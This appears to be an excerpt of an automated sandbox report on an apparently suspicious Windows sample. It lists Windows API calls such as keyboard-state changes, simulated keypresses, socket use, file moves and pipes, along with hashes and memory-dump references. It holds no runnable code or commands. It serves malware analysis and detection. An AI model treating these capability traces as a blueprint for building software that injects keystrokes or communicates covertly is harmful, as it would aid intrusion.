                                                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fcc1cb2cc1c80810ca37c4a2b074c62eceb7c8f14b927dcaa9e2144b2556c6a4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 56275398a09e76b6c3dbd4f195d37876336dd477dd2f94ad27c4b9993dcfb788
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fcc1cb2cc1c80810ca37c4a2b074c62eceb7c8f14b927dcaa9e2144b2556c6a4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D751E2E0A287D63EFB374E348C45BB6BEA95B06704F088489E2D5458D2C3D8ACE4DB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 0023B6E0
• GetKeyboardState.USER32(?), ref: 0023B6F5
• SetKeyboardState.USER32(?), ref: 0023B756
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0023B782
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0023B79F
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0023B7DE
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0023B7FF
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00205F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 002057E3
• __fassign.LIBCMT ref: 0020585E
• __fassign.LIBCMT ref: 00205879
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0020589F
• WriteFile.KERNEL32(?,FF8BC35D,00000000,00205F16,00000000,?,?,?,?,?,?,?,?,?,00205F16,?), ref: 002058BE
• WriteFile.KERNEL32(?,?,00000001,00205F16,00000000,?,?,?,?,?,?,?,?,?,00205F16,?), ref: 002058F7
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
• _ValidateLocalCookies.LIBCMT ref: 001F30BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 001F30C3
• _ValidateLocalCookies.LIBCMT ref: 001F3151
• __IsNonwritableInCurrentImage.LIBCMT ref: 001F317C
• _ValidateLocalCookies.LIBCMT ref: 001F31D1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
  • Part of subcall function 00253AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
  • Part of subcall function 00253AAB: _wcslen.LIBCMT ref: 00253AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00251B6F
• WSAGetLastError.WSOCK32 ref: 00251B7E
• WSAGetLastError.WSOCK32 ref: 00251C26
• closesocket.WSOCK32(00000000), ref: 00251C56
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0023D7CD,?), ref: 0023E714
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0023D7CD,?), ref: 0023E72D
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0023D7F0
                                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0023D82A
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023D8B0
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023D8C6
                                                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 0023D90C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00244310
                                                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00244367
                                                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00244390
                                                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0024439A
                                                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002443AB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                                            • String ID: (*
                                                                                                                                                                                                                                                                                                                            • API String ID: 2256411358-1658319840
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002638B8
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002638EB
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00263920
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00263952
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0026397C
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0026398D
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002639A7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002380D0
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002380F6
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002380F9
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238117
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00238120
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00238145
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238153
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002381A9
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002381CF
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 002381D2
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 002381F3
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 002381FC
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00238216
                                                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00238224
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00240E99
                                                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00240ED5
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00240F6D
                                                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00240FA8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 82eb093de0953a84704b48cb8c8fad62c04c31fca9f286167f64c33acfdd6291
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c7fc62d281712df1747fb36d2900f8d16c5cef4842655633ae755d0b8c8a6455
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82eb093de0953a84704b48cb8c8fad62c04c31fca9f286167f64c33acfdd6291
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21A335A1034ADBDB348F689C44A9977A8BF55720F204A19FDA1D32D0DBB198E4DB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001D78B1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: GetStockObject.GDI32(00000011), ref: 001D78C5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001D78CF
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00264BB0
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00264BBD
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00264BC8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00264BD7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00264BE3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                                            • Opcode ID: bdc608d58f78fc196b9955b35e4e6ae9d9fe5829ff7d2be8a1ac2a4becdeaf4a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: afdbd61f3534c3a76eabfaf1fcfff569c3e68e21b26d38caa18e0f4eab013b28
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdc608d58f78fc196b9955b35e4e6ae9d9fe5829ff7d2be8a1ac2a4becdeaf4a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 911193B155021EBEEF119E65CC85EEB7F5DEF09758F014111F648A2090CA71DC619BA4
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                                                                                            • String ID: j`#
                                                                                                                                                                                                                                                                                                                            • API String ID: 2931989736-2107346225
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fd64c6453d1c1e5c6160f75daef4161b376919dfede97d161b42d4b5e17624c1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 63acdd90d52b28396ad94df35e953df61b4965eccdb304d79d40afb440f25a5a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd64c6453d1c1e5c6160f75daef4161b376919dfede97d161b42d4b5e17624c1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F70179E5620709BBD6186A215C87F7B736DAE7139CF00C125FE0D9A241E7B1ED34C1A1
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0023E328
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0023E32F
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0023E345
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 0023E34C
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0023E390
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0023E36D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5138f32732584fa85cf3ba061fc3bfaa95288e9edc7954445a318116f82e4479
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5e23cf3a3059537884a1dcf95ac54c4b288df83577a772a86e045c2297598202
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5138f32732584fa85cf3ba061fc3bfaa95288e9edc7954445a318116f82e4479
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F0112F6E1020C7FE7119BA4ED8DEE6776CD708300F418595F74AE6041E6B49E848B75
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00241322
                                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00241334
                                                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00241342
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00241350
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0024135F
                                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0024136F
                                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00241376
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2906e8c1e858a133f94eb3392dde9f6e2c44868becc672f0efce264383c3a3fe
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7f19943bd8d31d346edea3877702c7dded1b6400fdfac39d97a8dc2df51465a8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2906e8c1e858a133f94eb3392dde9f6e2c44868becc672f0efce264383c3a3fe
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F03C32642A06BBD7411F54FE4DBC6BB39FF05702F505061F101918A0C7B4A8B0CF90
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0025281D
                                                                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0025283E
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 0025284F
                                                                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00252938
                                                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 002528E9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023433E: _strlen.LIBCMT ref: 00234348
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0024F669), ref: 00253C9D
                                                                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00252992
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
